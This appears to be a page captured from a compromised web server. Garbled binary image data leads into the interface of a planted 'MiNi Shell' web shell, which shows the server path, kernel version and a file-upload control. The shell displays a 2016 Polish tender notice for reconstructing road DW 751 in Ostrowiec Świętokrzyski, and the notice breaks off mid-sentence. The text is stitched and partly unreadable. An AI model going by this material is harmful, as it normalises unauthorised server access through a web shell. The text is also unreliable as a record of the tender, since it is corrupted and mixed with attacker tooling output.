JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160623/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160623/100005-N-2016.html

<p class="kh_header"><b>Kielce: Przebudowa DW 751 na odcinku ul. Traugutta od Ronda 25-lecia NSZZ Solidarność do Ronda Republiki Ostrowieckiej</b><br>
<b>Numer ogłoszenia: 100005 - 2016; data zamieszczenia: 23.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Świętokrzyski Zarząd Dróg Wojewódzkich , ul. Jagiellońska 72, 25-602 Kielce, woj. świętokrzyskie, tel. 041 347-04-71,80,81,90,91, faks 041 347-04-70.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szdw.kielce.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa DW 751 na odcinku ul. Traugutta od Ronda 25-lecia NSZZ Solidarność do Ronda Republiki Ostrowieckiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa DW 751 na odcinku ul. Traugutta od Ronda 25-lecia NSZZ Solidarność do Ronda Republiki Ostrowieckiej. Zakres przedmiotu zamówienia obejmuje roboty na odcinku drogi wojewódzkiej Nr 751 ul Traugutta w Ostrowcu Świętokrzyskim pomiędzy rondem 25-lecia NSZZ Solidarność a rondem Republiki Ostrowieckiej wraz z rondem 25-lecia NSZZ Solidarność a w szczególności: Rondo 25-lecia NSZZ Solidarność:
- frezowanie istniejącej warstwy ścieralnej, - rozbiórka istniejącego pierścienia najazdowego ronda, - wykonanie koryta pod nową konstrukcję pierścienia najazdowego ronda, - wykonanie konstrukcji pod nawierzchnię pierścienia najazdowego, - ułożenie krawężników kamiennych 20x30x50 na pierścieniu najazdowym ronda, - ułożenie nawierzchni z kostki granitowej na pierścieniu najazdowym ronda - wymiana uszkodzonych krawężników i obrzeży, - przebrukowanie istniejących ciągów dla pieszych, - wykonanie nasadzeń roślinnych, - regulacja wysokościowa urządzeń obcych znajdujących się w chodnikach, - wykonanie warstwy ścieralnej z SMA - odtworzenie oznakowania poziomego. Odcinek pomiędzy rondami:
- rozbiórka obrzeży chodnikowych, - rozbiórka krawężników, - rozbiórka istniejących ciągów pieszych, - usunięcie warstwy ziemi urodzajnej, - rozbiórka nawierzchni na zatoce autobusowej, - frezowanie istniejącej nawierzchni bitumicznej, - budowa chodników z kostki betonowej bezfazowej grubości 8 cm na podsypce cementowo - piaskowej, - ustawienie nowych krawężników betonowych, - wykonanie nowej nawierzchni na zatoce autobusowej, - budowa ścieku przykrawężnikowego szerokości 21cm z kostki betonowej grubości 8cm,- ułożenie siatki wysoko - sprężystej z włóknami szklano-węglowymi, - warstwa wiążąca z WMS 16 W o grubości 8 cm,
- wykonanie warstwy  ścieralnej z SMA 11S o grubości 4 cm, - regulacja wysokościowa urządzeń obcych znajdujących się w chodnikach, - montaż nowej wiaty przystankowej, - wykonanie trawników dywanowych, - odtworzenie oznakowania poziomego. Na całym odcinku w zakresie istniejącej kanalizacji:- wykonanie przykanalików o średnicy 200 mm - 2 szt, - zabudowa betonowych studni wpustowych o średnicy 500 mm z rusztem żeliwnym - 2 szt, - czyszczenie ciśnieniowe wraz z odmuleniem istniejących studni rewizyjnych i wpustowych dla kanalizacji deszczowej, - czyszczenie ciśnieniowe wraz z odmuleniem istniejących kanałów i przykanalików dla kanalizacji deszczowej, - kamerowanie istniejącej sieci kanalizacji deszczowej, - remont istniejących studni rewizyjnych kanalizacji deszczowej - reperacja ubytków, naprawa stopni i kinet, zabezpieczenie ścian studni modyfikowanymi zaprawami cementowymi, - wymiana i regulacja żeliwnych elementów studni rewizyjnych kanalizacji deszczowej znajdujących się w jezdni, - wymiana i regulacja żeliwnych elementów studzienek wpustowych kanalizacji deszczowej znajdujących się w jezdni, - wymiana i regulacja żeliwnych elementów studni rewizyjnych kanalizacji sanitarnej znajdujących się w jezdni. W zakresie organizacji ruchu należy opracować i zatwierdzić projekt tymczasowej organizacji ruchu wraz z elementami oznakowania i utrzymaniem oznakowania przez okres realizacji robót.  
 Zamówienie będzie realizowane zgodnie z Skróconą Dokumentacją Techniczną, Przedmiarem robót, Kosztorysem ofertowym, Szczegółowymi Specyfikacjami Technicznymi oraz harmonogramem rzeczowo-finansowym.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający dopuszcza możliwość udzielenia zamówienia uzupełniającego w trybie art. 67 ust. 1 pkt. 6 Ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych w wysokości nie większej niż 50% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.13.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępując do przetargu jest obowiązany wnieść wadium w
wysokości 10 900,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych wymagań w tym zakresie. Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował (zakończył) co najmniej 1 zadanie w zakresie budowy, przebudowy, lub rozbudowy drogi o wartości minimum 500.000,00 zł brutto; Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunek. Warunek, o którym mowa powyżej ma na celu zweryfikowanie zdolności
wykonawcy do należytego wykonania udzielanego zamówienia. Oceny spełnienia warunku Zamawiający dokona na podstawie dokumentów i oświadczeń wymienionych w pkt.8 SIWZ -Instrukcji dla Wykonawców, sprawdzając kompletność, spełnianie warunku oraz jakość złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych wymagań w tym zakresie. Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje lub będzie dysponować, w okresie przewidzianym na realizację zamówienia osobami legitymującymi się kwalifikacjami zawodowymi oraz doświadczeniem odpowiednim do objęcia funkcji, jakie zostaną im powierzone. Wykonawca przedstawi w ofercie kandydata na stanowisko - Kierownik robót w specjalności drogowej - 1 osoba. Wskazana osoba winna posiadać uprawnienia budowlane do kierowania robotami w specjalności drogowej oraz doświadczenie zawodowe w pełnieniu funkcji kierownika budowy lub kierownika robót drogowych przy realizacji min. jednej roboty budowlanej polegającej na budowie, przebudowie lub rozbudowie drogi o wartości minimum 500.000,00 zł brutto. Kierownik robót drogowych będzie jednocześnie sprawował funkcję Kierownika Budowy. Zamawiający określając wymogi dla potencjału kadrowego w zakresie
posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (Dz.U. z 2010 r. nr 243, poz.
1623) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2016 r., Nr 63, poz. 65). Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunek. Warunek, o którym mowa powyżej ma na celu zweryfikowanie zdolności wykonawcy do należytego wykonania udzielanego
zamówienia. Oceny spełnienia warunku Zamawiający dokona na podstawie dokumentów i oświadczeń wymienionych w pkt.8 SIWZ -Instrukcji dla Wykonawców, sprawdzając kompletność, spełnianie warunku oraz jakość złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych wymagań w tym zakresie. Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Jeżeli w kraju miejsca zamieszkania osoby lub w kraju,w którym wykonawca ma siedzibę lub miejsce
zamieszkania, nie wydaje się dokumentów, o których mowa w pkt.III 4.3, zastępuje się je dokumentem
zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone
przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub
gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub
miejsce zamieszkania, lub przed notariuszem. 2.W przypadku wątpliwości co do treści dokumentu złożonego przez
wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający
może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym
wykonawca ma siedzibę lub miejsce zamieszkania z wnioskiem o udzielenie niezbędnych informacji dotyczących
przedłożonego dokumentu. 3. Dla potwierdzenia spełnienia warunków udziału w postępowaniu o których mowa w
art. 22 ust. 1 Pzp i potwierdzenia braku podstaw do wykluczenia na podstawie art. 24 ust. 1 Pzp, Wykonawcy
wspólnie ubiegający się o udzielenie zamówienia winni złożyć oświadczenia i dokumenty w sposób następujący:
a/oświadczenie powinno być złożone w imieniu wszystkich Wykonawców składających ofertę wspólną np. przez
Pełnomocnika, b/ pkt. III.4.1) - potwierdzający łączne spełnienie warunków, dokumenty winien przedłożyć w
imieniu wszystkich Wykonawców ten, lub ci spośród Wykonawców, którzy potwierdzają spełnienie warunków,
c/pkt. III.4.2) - ma zastosowanie do wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia
(oświadczenie i dokumenty winny być przedłożone przez każdego z tych Wykonawców. 4. Wykonawca może
polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia,
zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go
z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie
dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne
zobowiązanie tych podmiotów (przedłożone w oryginale) do oddania mu do dyspozycji niezbędnych zasobów na
potrzeby wykonania zamówienia. (Zobowiązanie winno wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia
Wykonawcy ubiegającemu się o zamówienie, odpowiedniego zasobu - wskazać jego rodzaj/zakres, czas
udzielenia a także inne istotne okoliczności, w tym formę/sposób uczestnictwa w realizacji
zamówienia.Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na
zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty
dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2). 5. Pełnomocnictwo
do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik. 6. W przypadku ubiegania się o zamówienie
przez konsorcjum (tzn. Wykonawcy określonemu w art. 23 ust. 1 ustawy Pzp) - do oferty należy załączyć
pełnomocnictwo do reprezentowania wszystkich Wykonawców ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - gwarancja - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwości zmiany postanowień umowy w przypadkach wystąpienia istotnych
okoliczności, w szczególności przyznające prawo do jej zmiany uznawane będą: 1. Zmiany technologii wykonania
danego za?kresu robót określonego w dokumentacji projektowej, pod warunkiem, iż nie spowodują one obniżenia
jakości wykonania zamówienia. Zmiany te muszą zostać spowodowane uzasadniającymi je okolicznościami
zaistniałymi w trakcie realizacji przedmiotu umowy, a w szczególności: a) pojawieniem się na rynku materiałów,
sprzętu lub urządzeń nowszej generacji pozwalających na zmniejszenie kosztów realizacji robót, kosztów
eksploatacji inwestycji lub umożliwiających uzyskanie lepszej jakości robót, b) pojawieniem się nowszej technologii
wykonania robót, pozwalającej na skrócenie czasu realizacji robót, zmniejszenie kosztów realizacji robót lub
kosztów eksploatacji inwestycji, c) zmianą przepisów prawa, powodującą konieczność zrealizowania inwestycji
przy zastosowaniu innych rozwiązań technicznych lub materiałowych. 2. Zmiany będące konsekwencją
zastosowania innej technologii, w szczególności zmiana terminu realizacji zamówienia i wynagrodzenia umownego
(zwiększenie lub zmniejszenie) w niezbędnym zakresie i jeśli będzie to konieczne i uzasadnione. 3. Rozliczenie
zmian technologicznych wymienionych w ust. l będzie możliwe po wykonaniu przez Wykonawcę, zaakceptowanego
przez Zamawiającego, kosztorysu różnicowego, wykonanego zgodnie z następującymi założeniami: a) Wykonawca
wyliczy cenę prac, jaką należałoby przyjąć przy zastosowaniu technologii, która miała być pierwotnie
zastosowana; b) Wykonawca wyliczy cenę prac, jaką należy przyjąć przy zastosowaniu technologii zamiennej; c)
Wykonawca wyliczy różnicę między ww. cenami; Wykonawca dokona wyliczenia ww. cen wykonania prac w
technologii pierwotnej i zamiennej na podstawie następujących założeń: - Wykonawca przyjmie ceny jednostkowe
robót, technologii nie większe niż średnie ceny zawarte w zeszytach SEKOCENBUD dla kwartału poprzedzającego
termin wykonania robót budowlanych, - Wykonawca przyjmie jako podstawę do określenia nakładów rzeczowych
Katalogi Nakładów Rzeczowych (KNR), a w przypadku braku odpowiednich pozycji w KNR-ach - Katalogi Norm
Nakładów Rzeczowych (KNNR), a w przypadku braku odpowiednich pozycji w KNNR-ach dokonana zostanie
wycena własna Wykonawcy, podlegająca zatwierdzeniu przez Zamawiającego; d) kosztorys różnicowy należy przedłożyć Zamawiającemu do akceptacji. Zamawiający może wnieść uwagi i sugestie, które po uzgodnieniu przez
strony powinny zostać uwzględnione w kosztorysie. 4. Zmiany terminu wykonania zamówienia w przypadku:a)
zmian będących następstwem okoliczności zaistniałych w trakcie realizacji zamówienia nieznanych w dniu
podpisania umowy, a w szczególności wystąpieniem niesprzyjających warunków atmosferycznych,
archeologicznych, geologicznych, hydrologicznych lub zaistnienia kolizji z sieciami infrastruktury, uniemożliwiających
terminowe wykonanie zamówienia, b) konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji
projektowej, jeżeli konieczność wprowadzenia zmian wynika z okoliczności, których Zamawiający nie mógł
przewidzieć, c) konieczność wykonania robót dodatkowych, d) konieczności udzielenia zamówień dodatkowych
niezbędnych do prawidłowego wykonania zamówienia podstawowego, o których mowa w art. 67 ust. 1 pkt 5
ustawy PZP lub zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy PZP, których wykonanie
stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia i które mają wpływ na termin
zamówienia, e) ujawnienia niezinwentaryzowanych lub o odmiennym przebiegu niezgodnym z inwentaryzacją
podziemnych sieci, instalacji lub urządzeń obcych i konieczności wykonania robót związanych z ich
zabezpieczeniem lub usunięciem kolizji, f) zawieszenia robót przez Zamawiającego z przyczyn niezależnych od
Wykonawcy, g) działania siły wyższej (na przykład klęski żywiołowe, strajki generalne lub lokalne), mającej
bezpośredni wpływ na terminowość wykonywania robót; h) wystąpienia okoliczności, których strony umowy nie
były w stanie przewidzieć, pomimo zachowania należytej staranności; i) wykopalisk uniemożliwiających
wykonywanie robót; j) zmian będących następstwem działania organów administracji lub osób indywidualnych, w
szczególności: - gdy pomimo wystąpienia Wykonawcy lub Zamawiającego o wydanie decyzji administracyjnej,
warunków technicznych lub innego dokumentu niezbędnego do prawidłowej realizacji przedmiotu umowy w terminie
ustawowo przewidzianym dla danej czynności organ administracji publicznej lub inna upoważniona instytucja nie
wyda stosownego dokumentu lub decyzji (przedłużenie terminu realizacji będzie dopuszczalne jedynie o okres
trwania czynności organów administracji publicznej lub instytucji przekraczający termin ustawowo przewidziany dla
danej czynności), - gdy pomimo dochowania należytej staranności Wykonawcy pozyskiwanie stosownych
uzgodnień gestorów sieci, innych podmiotów lub osób, których opinia lub zgoda będzie wymagana przepisami
prawa, przedłuży się w czasie ponad termin zwyczajowo przyjęty dla danej czynności (przedłużenie terminu
realizacji będzie dopuszczalne jedynie o okres trwania czynności wykraczający poza zwyczajowo przyjęty), - w
przypadku wystąpienia nieprzewidywanych w dniu podpisywania niniejszej umowy kolizji z planowanymi lub
